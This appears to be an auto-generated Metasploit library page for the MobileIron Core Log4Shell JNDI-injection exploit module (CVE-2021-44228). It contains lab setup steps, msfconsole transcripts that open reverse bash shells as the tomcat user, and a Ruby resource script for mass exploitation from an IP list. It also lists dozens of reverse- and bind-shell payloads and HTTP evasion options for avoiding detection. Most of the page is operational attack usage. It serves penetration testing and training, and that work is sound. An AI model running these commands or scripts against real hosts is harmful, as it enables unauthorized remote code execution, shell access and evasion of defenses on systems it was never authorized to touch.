MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) - Metasploit


This page contains detailed information about how to use the exploit/linux/http/mobileiron_core_log4shell metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
Module: exploit/linux/http/mobileiron_core_log4shell
Source code: modules/exploits/linux/http/mobileiron_core_log4shell.rb
Disclosure date: 2021-12-12
Last modification time: 2022-08-02 11:04:13 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-44228

This module is also known as Log4Shell or LogJam.

MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This module will start an LDAP server that the target will need to connect to.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using mobileiron_core_log4shell against a single host

Normally, you can use exploit/linux/http/mobileiron_core_log4shell this way:

msf > use exploit/linux/http/mobileiron_core_log4shell
msf exploit(mobileiron_core_log4shell) > show targets
    ... a list of targets ...
msf exploit(mobileiron_core_log4shell) > set TARGET target-id
msf exploit(mobileiron_core_log4shell) > show options
    ... show and set options ...
msf exploit(mobileiron_core_log4shell) > exploit

Using mobileiron_core_log4shell against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your mobileiron_core_log4shell will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/mobileiron_core_log4shell")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Description

MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user.

This module will start an LDAP server that the target will need to connect to.

Setup

Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.

MobileIron Core Appliance ISO Installation on VMWare Fusion

  1. Obtain a mobileiron-##.#.#.#-##.iso file, the following steps utilize mobileiron-10.6.0.0-23.iso.
  2. Use the ISO to create "A New Virtual Machine".
  3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode so that I can hit it over the network.
  4. Boot the new virtual machine.
  5. Type vm-install at the boot: prompt.
  6. Wait patiently while the VM reboots and begins the install process. The system will reboot when installation completes.
  7. When prompted with Continue with configuration dialog?, type yes
  8. Type q to clear the license from the screen.
  9. Accept the End User License Agreement by typing yes
  10. Enter a Company Name / contact / email of your choosing. They don't matter.
  11. Configure an enable password (e.g. Labpass1)
  12. Enter an admin user name (e.g. albinolobster)
  13. Enter and confirm an admin password (e.g. Labpass1)
  14. Select a for the management interface
  15. Assign a static IP address and network mask that works with your test network. (e.g. 10.9.49.101 and 255.255.255.0)
  16. Enter your test networks default gateway (e.g. 10.9.49.1)
  17. Enter a fully-qualified domain name for the device (e.g. lobster.example.com). Unfortunately, this needs to work. I added a static DNS enty to my lab network's router.
  18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. 10.9.49.1)
  19. Enter blank entries for name server 2 and 3.
  20. yes to enable remote shell access (why not, right?)
  21. no to configuring NTP
  22. no to configuring system clock
  23. yes to commit changes
  24. Type reload to restart the system and yes, when prompted, to both saving the configuration and proceeding with the reload
  25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
  26. Visit https://ipaddr to ensure the HTTP server has fully loaded

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/linux/http/mobileiron_core_log4shell
  3. Set the RHOSTS, LHOST, and SRVHOST
  4. Do: run
  5. If the target is vulnerable, the payload should be executed

Scenarios


MobileIron Core 11.2.0.0-31

msf6 > use exploit/linux/http/mobileiron_core_log4shell
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
LHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
SRVHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
SRVPORT => 1389
msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
RHOSTS => 10.9.49.100
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[*] Started reverse TCP handler on 10.9.49.248:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
[*] Server stopped.

id
uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
uname -a
Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

MobileIron Core 10.6.0.0-23

msf6 > use exploit/linux/http/mobileiron_core_log4shell
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
LHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
SRVHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
SRVPORT => 1389
msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
RHOSTS => 10.9.49.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[*] Started reverse TCP handler on 10.9.49.248:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
[*] Server stopped.

id
uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
uname -a
Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 10.9.49.101 - Command shell session 1 closed.

Go back to menu.

Msfconsole Usage


Here is how the linux/http/mobileiron_core_log4shell exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/mobileiron_core_log4shell

[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > show info

       Name: MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
     Module: exploit/linux/http/mobileiron_core_log4shell
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-12-12

Provided by:
  Spencer McIntyre
  RageLtMan <rageltman@sempervictus>
  rwincey
  jbaines-r7

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Linux

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  LDIF_FILE                   no        Directory LDIF file path
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                         to listen on all addresses.
  SRVPORT    389              yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  MobileIron Core is affected by the Log4Shell vulnerability whereby a 
  JNDI string sent to the server will cause it to connect to the 
  attacker and deserialize a malicious Java object. This results in OS 
  command execution in the context of the tomcat user. This module 
  will start an LDAP server that the target will need to connect to.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
  https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US
  https://www.mandiant.com/resources/mobileiron-log4shell-exploitation

Also known as:
  Log4Shell
  LogJam

Related modules:
  auxiliary/scanner/http/log4shell_scanner
  exploit/multi/http/log4shell_header_injection

Module Options


This is a complete list of options available in the linux/http/mobileiron_core_log4shell exploit:

msf6 exploit(linux/http/mobileiron_core_log4shell) > show options

Module options (exploit/linux/http/mobileiron_core_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                         0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

Advanced Options


Here is a complete list of advanced options supported by the linux/http/mobileiron_core_log4shell exploit:

msf6 exploit(linux/http/mobileiron_core_log4shell) > show advanced

Module advanced options (exploit/linux/http/mobileiron_core_log4shell):

   Name                                Current Setting                     Required  Description
   ----                                ---------------                     --------  -----------
   AddClassPath                                                            no        Additional java classpath
   AutoCheck                           true                                no        Run check before exploit
   ContextInformationFile                                                  no        The information file that contains context information
   DOMAIN                              WORKSTATION                         yes       The domain to use for Windows authentication
   DigestAuthIIS                       true                                no        Conform to IIS, should work for most servers. Only set to fa
                                                                                     lse for non-IIS servers
   DisablePayloadHandler               false                               no        Disable the handler code for the selected payload
   EnableContextEncoding               false                               no        Use transient context when encoding payloads
   FingerprintCheck                    true                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit                        false                               no        Override check result
   HttpClientTimeout                                                       no        HTTP connection and receive timeout
   HttpPassword                                                            no        The HTTP password to specify for authentication
   HttpRawHeaders                                                          no        Path to ERB-templatized raw headers to append to existing he
                                                                                     aders
   HttpTrace                           false                               no        Show the raw HTTP requests and responses
   HttpTraceColors                     red/blu                             no        HTTP request and response colors for HttpTrace (unset to dis
                                                                                     able)
   HttpTraceHeadersOnly                false                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                            no        The HTTP username to specify for authentication
   JavaCache                           /home/myuser/.msf4/javacache        yes       Java cache location
   LDAP_AUTH_BYPASS                    true                                yes       Ignore LDAP client authentication
   LdapServerTcp                       true                                yes       Serve TCP LDAP requests
   LdapServerUdp                       true                                yes       Serve UDP LDAP requests
   ListenerBindAddress                                                     no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                        no        The port to bind to if different from SRVPORT
   ListenerComm                                                            no        The specific communication channel to use for this service
   Powershell::encode_final_payload    false                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload    false                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place           false                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                false                               yes       Encrypt PSH with RC4
   Powershell::method                  reflection                          yes       Payload delivery method (Accepted: net, reflection, old, msi
                                                                                     l)
   Powershell::no_equals               false                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive          true                                yes       Execute powershell without interaction
   Powershell::persist                 false                               yes       Run the payload in a loop
   Powershell::prepend_protections_by  auto                                yes       Prepend AMSI/SBL bypass (Accepted: auto, true, false)
   pass
   Powershell::prepend_sleep                                               no        Prepend seconds of sleep
   Powershell::remove_comspec          false                               yes       Produce script calling powershell directly
   Powershell::strip_comments          true                                yes       Strip comments
   Powershell::strip_whitespace        false                               yes       Strip whitespace
   Powershell::sub_funcs               false                               yes       Substitute function names
   Powershell::sub_vars                true                                yes       Substitute variable names
   Powershell::wrap_double_quotes      true                                yes       Wraps the -Command argument in single quotes
   SSLServerNameIndication                                                 no        SSL/TLS Server Name Indication (SNI)
   SSLVersion                          Auto                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL
                                                                                     23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TL
                                                                                     S1, TLS1.1, TLS1.2)
   UserAgent                           Mozilla/5.0 (Macintosh; Intel Mac   no        The User-Agent header to use for all requests
                                       OS X 12.2; rv:97.0) Gecko/20100101
                                        Firefox/97.0
   VERBOSE                             false                               no        Enable detailed status messages
   WORKSPACE                                                               no        Specify the workspace for this module
   WfsDelay                            30                                  no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_bash):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy b
                                                          ut directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/mobileiron_core_log4shell module can exploit:

msf6 exploit(linux/http/mobileiron_core_log4shell) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/mobileiron_core_log4shell exploit:

msf6 exploit(linux/http/mobileiron_core_log4shell) > show payloads

Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                              normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                                  normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                              normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                              normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                           normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                               normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                           normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                             normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                                normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                             normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                                        normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                             normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                              normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                               normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                                         normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                                      normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/python/meterpreter/bind_tcp                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   20  payload/cmd/unix/python/meterpreter/bind_tcp_uuid                      normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   21  payload/cmd/unix/python/meterpreter/reverse_http                       normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   22  payload/cmd/unix/python/meterpreter/reverse_https                      normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   23  payload/cmd/unix/python/meterpreter/reverse_tcp                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   24  payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   25  payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   26  payload/cmd/unix/python/meterpreter_bind_tcp                           normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   27  payload/cmd/unix/python/meterpreter_reverse_http                       normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   28  payload/cmd/unix/python/meterpreter_reverse_https                      normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   29  payload/cmd/unix/python/meterpreter_reverse_tcp                        normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   30  payload/cmd/unix/python/pingback_bind_tcp                              normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   31  payload/cmd/unix/python/pingback_reverse_tcp                           normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   32  payload/cmd/unix/python/shell_bind_tcp                                 normal  No     Python Exec, Command Shell, Bind TCP (via python)
   33  payload/cmd/unix/python/shell_reverse_tcp                              normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   34  payload/cmd/unix/python/shell_reverse_tcp_ssl                          normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   35  payload/cmd/unix/python/shell_reverse_udp                              normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   36  payload/cmd/unix/reverse                                               normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   37  payload/cmd/unix/reverse_awk                                           normal  No     Unix Command Shell, Reverse TCP (via AWK)
   38  payload/cmd/unix/reverse_bash                                          normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   39  payload/cmd/unix/reverse_bash_telnet_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   40  payload/cmd/unix/reverse_bash_udp                                      normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   41  payload/cmd/unix/reverse_jjs                                           normal  No     Unix Command Shell, Reverse TCP (via jjs)
   42  payload/cmd/unix/reverse_ksh                                           normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   43  payload/cmd/unix/reverse_lua                                           normal  No     Unix Command Shell, Reverse TCP (via Lua)
   44  payload/cmd/unix/reverse_ncat_ssl                                      normal  No     Unix Command Shell, Reverse TCP (via ncat)
   45  payload/cmd/unix/reverse_netcat                                        normal  No     Unix Command Shell, Reverse TCP (via netcat)
   46  payload/cmd/unix/reverse_netcat_gaping                                 normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   47  payload/cmd/unix/reverse_nodejs                                        normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   48  payload/cmd/unix/reverse_openssl                                       normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   49  payload/cmd/unix/reverse_perl                                          normal  No     Unix Command Shell, Reverse TCP (via Perl)
   50  payload/cmd/unix/reverse_perl_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   51  payload/cmd/unix/reverse_php_ssl                                       normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   52  payload/cmd/unix/reverse_python                                        normal  No     Unix Command Shell, Reverse TCP (via Python)
   53  payload/cmd/unix/reverse_python_ssl                                    normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   54  payload/cmd/unix/reverse_r                                             normal  No     Unix Command Shell, Reverse TCP (via R)
   55  payload/cmd/unix/reverse_ruby                                          normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   56  payload/cmd/unix/reverse_ruby_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   57  payload/cmd/unix/reverse_socat_udp                                     normal  No     Unix Command Shell, Reverse UDP (via socat)
   58  payload/cmd/unix/reverse_ssh                                           normal  No     Unix Command Shell, Reverse TCP SSH
   59  payload/cmd/unix/reverse_ssl_double_telnet                             normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   60  payload/cmd/unix/reverse_stub                                          normal  No     Unix Command Shell, Reverse TCP (stub)
   61  payload/cmd/unix/reverse_tclsh                                         normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   62  payload/cmd/unix/reverse_zsh                                           normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   63  payload/generic/custom                                                 normal  No     Custom Payload
   64  payload/generic/shell_bind_tcp                                         normal  No     Generic Command Shell, Bind TCP Inline
   65  payload/generic/shell_reverse_tcp                                      normal  No     Generic Command Shell, Reverse TCP Inline
   66  payload/generic/ssh/interact                                           normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/mobileiron_core_log4shell exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/mobileiron_core_log4shell) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No HTTP response was received.


Here is a relevant code snippet related to the "No HTTP response was received." error message:

79:	
80:	    vprint_status('Attempting to trigger the jndi callback...')
81:	
82:	    start_service
83:	    res = trigger
84:	    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
85:	
86:	    wait_until { @search_received }
87:	    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
88:	  ensure
89:	    cleanup_service

No LDAP search query was received.


Here is a relevant code snippet related to the "No LDAP search query was received." error message:

82:	    start_service
83:	    res = trigger
84:	    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
85:	
86:	    wait_until { @search_received }
87:	    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
88:	  ensure
89:	    cleanup_service
90:	  end
91:	
92:	  def build_ldap_search_response_payload

Failed to trigger the vulnerability


Here is a relevant code snippet related to the "Failed to trigger the vulnerability" error message:

121:	  def exploit
122:	    validate_configuration!
123:	    @exploiting = true
124:	    start_service
125:	    res = trigger
126:	    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
127:	    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302
128:	
129:	    wait_until { @search_received && (!handler_enabled? || session_created?) }
130:	    handler
131:	  end

The server replied to the trigger in an unexpected way


Here is a relevant code snippet related to the "The server replied to the trigger in an unexpected way" error message:

122:	    validate_configuration!
123:	    @exploiting = true
124:	    start_service
125:	    res = trigger
126:	    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
127:	    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302
128:	
129:	    wait_until { @search_received && (!handler_enabled? || session_created?) }
130:	    handler
131:	  end
132:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Spencer McIntyre
  • RageLtMan <rageltman[at]sempervictus>
  • rwincey
  • jbaines-r7

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.